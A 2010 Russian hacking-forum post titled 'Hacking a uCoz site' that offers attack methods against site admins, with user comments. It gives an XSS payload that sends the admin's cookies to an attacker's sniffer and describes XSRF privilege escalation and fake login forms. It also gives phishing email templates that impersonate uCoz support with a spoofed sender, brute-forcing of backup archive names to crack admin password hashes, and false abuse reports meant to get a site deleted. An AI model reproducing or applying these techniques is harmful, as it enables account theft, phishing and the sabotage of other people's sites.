Deprecated: mysql_escape_string(): This function is deprecated; use mysql_real_escape_string() instead. in /var/www/fealse/data/www/club.fealse.ru/engine/classes/mysqli.class.php on line 162 Взлом uCoz сайта » DLE клуб FeAlSe // шаблоны для DLE модули для dle скачать DataLife Engine templates ДЛЕ вду

Клуб FeAlSe » ENGINE » Другие ENGINE » Взлом uCoz сайта

Взлом uCoz сайта

Поделился johaNs в категории ENGINE » Другие ENGINE 5-05-2010, 16:05
Вступление

Начнём с того, что паблик уязвимостей на укозе пока не обнаружено. Это факт. Поэтому можете не насиловать Bugtraq. Укоз вообще не предоставляет возможность установки php скриптов мотивируя это тем что начинающие могут своими скриптами повредить сам укоз . Итак что мы имеем.

1) Активная XSS при включенном HTML
Если разрешено вставлять в сообщения (приватки, коменты, посты в миничате…) HTML код то пишем скрипт наподобие:
Цитата:img=new Image(); img.scr =”http://сайт/путь/к/cнифферу.php?s=”+escape(document.cookie);
Делаем сниффер на сайте с php (как ищите сами – сети полно самых разных php снифферов) или юзаем готовые сервисы. Теперь смотри в логи сниффа и ждём пока в них появится кука админа.
Ну во-первых по умолчанию опция вставки HTML отключена. Во-вторых если админ поставил галочку \"защита от подмены куков\" то вариант с куками отметается.

2) XSRF
Если можно вставлять HTML но куки защищены это не значит что всё потеряно. Можно сделать XSRF - пишешь ява скрипт, который когда на него зайдёт админ, от его имени пошлёт запрос и сделает тебя админом или хоть как-то повысит твои права. Скрипт дать не могу т.к. тут всё зависит от конкретной ситуации. Я думаю, вам не составит особого труда написать такой или спросить на форуме. Вообще разрешение на вставку HTML это очень серьёзная прореха в безопасности т.к. возможности XSS и XSRF практически ничем не ограничены и кража кук и подделка запросов это лишь простейший пример их использования.

3) Фейк
Можно ещё замутить фейк - опять же если разрешён HTML ява скриптами делаешь окошко с полем ввода пароля и ждёшь пока доверчивый админ введёт туда свои данные которые пересылаешь на сниффер. Можно так же сделать простой авто переход на заранее подготовленный фейк сайта:
document.location.href=\"сниффер\"

Но тут есть проблема – в строке адреса будет совсем другой сайт. Поэтому при создании таких фейков следует использовать сам юкос во-первых – готовыми шаблонами можно быстро содать похожий сайт, во вторых зарегать сайт с визуально похожим доменом и таким же доменом второго уровня можно лишь там.

4) Фокусы со смайлами

Отправляем жертве сообщение с вставкой:
[ IMG ]http://сайт/путь/к/smile.gif[ /IMG ]

Где smile.gif вовсе не картинка а php сниффер, который либо крадёт куки, либо, если куки защищены, выводит форму ввода пароля. Подробности по этому методу можно прочитать здесь.

5) Имитация взлома

Уж сколько бы укоз не утверждал что он никогда не просит выслать им пароли клиентов есть обстоятельство где они от этих правил отступают. Если вы взломали сайт на укозе и его бывший админ оказался слишком настойчив в своих жалобах, то вам на мыло (то которое значится в настройках сайта) прийдет письмо такого формата:

Цитата:От кого:
UcoZ Support
Кому:
Ваше_мыло
Дата:
Дата отправки сообщения. Обычно отсылают в рабочий день примерно в 2 часа дня.
Тема:
Re: UcoZ - Abuse Report - Нарушение, относящееся ко взлому
> -----------------------------------------------------------------
> Мой сайт на http://адрес_сайта.ucoz.ru взломали хакеры, они сменили пароль к админ-панели и емайл. Можно ли вернуть мой сайт?
> На сайте было X (количество) админов - я, перечисление админов.
> -----------------------------------------------------------------
>
>

Какой был самый первый пароль от панели управления?
Какой был самый первый е-майл, указанный при регистрации?

--
Имя_сотрудника_укоза, веб-сервисы UcoZ.

Внимание! При ответе обязательно сохраняйте цитирование переписки.


Никто не мешает нам послать это письмо админу, подделав обратный адрес abuse@ucoz.ru и поле заголовка Reply-to: указать настоящее мыло, что бы пароли ушли к нам, а не на подделанный адрес.
Ваше_мыло - заменяете мылом жертвы, отправляете письмо в будний день ближе к обеду что бы не спалится что писмо прилшо в воскресенье ночью (IMG:style_emoticons/default/smile.gif) Имя сотрудника и текст жалобы можно придумать любым. Можно сделать фейк сайта и от имени администрации юкоса (UcoZ ) попросить туда зайти например так:

Цитата:От: UcoZ
Кому: Мыло_жертвы
Написано: 30 февраля 2015 г., 0:34:34
Тема: UcoZ - Аккаунт отключен

Здравствуйте, Имя_админа.

Ваш сайт адрес_сайта был признан неактивным и отключен в соответствии
с Условиями использованя UcoZ.

У Вас есть 15 дней, чтобы восстановить сайт, перейдя по следующей ссылке:
-----------------------------------------------------------------
[color=#3333FF]Волшебная ссылка[/color]
-----------------------------------------------------------------
В противном случае, после упомянутого срока Ваш сайт будет полностью удален.

Прочтите наши Условия использования: http://www.ucoz.net/main/?a=terms


Всего наилучшего.

Такие письма отправляются скриптом поэтому прийдётся отправлять его ночью - см дату.

6) Брутфорс и backup

Укоз позволяет сделать резервную копию сайта, правда восстановить сайт из неё можно только за деньги . Несмотря на это юзеры часто делают себе backup сайтов, толи на память, толи посмотреть, как он выгладит. Суть в то что архив находится (по крайней мере находился когда-то) по адресу
http://адрес_сайта.ucoz.ru/имя_архива.zip

Мало того имя архива имеет вид _bk_десятьразныхцифрибукв.zip
Как показывает практика эти 10 символов тоже не случайны вот имена backup-ов двух разных когда то существовавших сайта:
_bk_2b81cada89.zip
_bk_2d90cada89.zip


Не сложно заметить что изменилось только 3 символа! Это даёт возможность относительно быстро подобрать путь к backup. Вполне возможно что такое положение дел уже изменилось. Укоз очень часто меняет формат содержимого backup-а, но я думаю вам не составит труда найти в нём users.txt а в нём запись типа:

Имя_админа|$1$4/E2$.BS0ZiRl7mtENwlcpc3D31|


$1$4/E2$.BS0ZiRl7mtENwlcpc3D31 - это хеш пароля админа, по формату хеша можно сказать что это MD5(Unix) где 4/E2 – это привязка, а .BS0ZiRl7mtENwlcpc3D31 – сам хеш.
Берём PasswordsPro и пытаемся сбрутить, либо пользуемся онлайн расшифровщиками с базой предвычисленных хешей.


7) Баги Укоза
Багов не так много, но иногда встречаются пассивные XSS, например, недавно кто то на античате находил пассивку на официальном сайте юкоса. Багу кажется, прикрыли но есть все шансы что они ещё проявятся – следите за сообщениями на форумах.

8 ) Удаление
Недостаток бесплатных хостингов – ваш сайт могут закрыть при первой же жалобе, даже если ту написал Вася Пупкин. По этому в приличной форме жалуемся по адресу abuse@ucoz.ru на неугодный сайт. Говорим что там выкладывают детское говно, призывают к экстримизму и что админ вообще глава Оркаидо. Для убедительности всем выше перечисленным можно заспамить форум. Если админ не успеет почистить сайт то его с большой вероятность удалят.

9) Остальные способы.
Это и протроянивание, и угон мыла с восстановлением пароля к сайту и подбор пароля к админке и СИ.
Самый надежный способ это троян – можно угнать сайт как бы он ни был защищён, но есть проблема. Все паблик трояны палятся антивирусами, а за самопальный можно получить 7 лет.
Угон мыла – сейчас все пользуются mail.ru, yandex.ru…у которых угнать мыло не легче чем без палева свистнуть телик в магазине.
Подбор пароля – надеятся на подбор всё равно, что на ключ под ковриком. Однако шанс есть т.к. на укозе в основном регистрируются начинающие админы которые ставят слабые пароли.
СИ – тут всё зависит от того какой вы психолог. К хакерству это не имеет никакого отношения, но скажу, при хорошо постеленных предложениях можно развести и того кто уже и 3 и 4 раза покупался на эту удочку. Однако не советую.
Вывод или что тебе будет

Угнать полностью сайт на юкосе не так просто из за секретного вопроса... Даже если ты завладеешь
куками или мылом админа то твоя власть над сайтом продлиться не долго. Если конечно админ не пользуется www для чтения почты и в его почтовом ящик не остались письма с паролями или пароли совпадают. Админ сможет вернуть свой сайт благодаря ответу на секретный вопрос.
За такую мелкую пакость как угон там сайта вас никто искать не будет. Т.к. на их официальном форуме чёрным по белому написано, что в краже сайта виноваты только сами пользователи. Да и такая компания как укоз с их репутацией и рекламой скорее удавится, чем признает свою вину даже если баг есть. Даже если бывший хозяин сайта предоставит их админам бейкап сайта и пароли которые стояли ранее его пошлют, мотивируя тем что при регистрации не указывалось не каких паспортных данных, а бейкап мог сделать любой кто подобрал пароль. В лучшем случае (для админа) вам на мыло может прийти письмо от администрации юкоса которое я показал выше.
Если вы не ответите на это письмо сайт всё равно не вернётся к админу – его просто удалят и заблокируют регистрацию такого домена на некоторое время.


Вот, собственно, и все.
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться, либо войти на сайт под своим именем.
Метки: Взлом, uCoz, сайта

Комментарии к Взлом uCoz сайта:

KinD

KinD

5 мая 2010 16:22

Хорошие статьи.) напиши статью для взлома фтп

johaNs

johaNs

5 мая 2010 16:58

Ну ты загнул. Такое есть но не вариант искать

FeAlSe

FeAlSe

5 мая 2010 17:10

Подробности по этому методу можно прочитать здесь.

может оформишь это как нужно, а не ctrlC ctrlV

Миллиардер

StiFix

StiFix

5 мая 2010 18:26

прочитал все и скажу свое мнение: НИОЧЕМ! ничего толкового небыло представлено...одна теория! fellow

johaNs

johaNs

5 мая 2010 19:16

StiFix заметь из теории всегда получаеться хорошая практика тока надо пр.руки иметь

dm1n выполнил как ты и сказал

KinD

KinD

5 мая 2010 20:49

johaNs

Он имеет ввиду что бы показал как ломать lol

johaNs

johaNs

6 мая 2010 11:54

Ломаю тока с дедика!

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.

Создать аккаунт

Реклама

Опрос на сайте

Каким браузером Вы пользуетесь чаще?


Opera
Mozilla Firefox
Google Chrome
Safari
Internet Explorer
другой...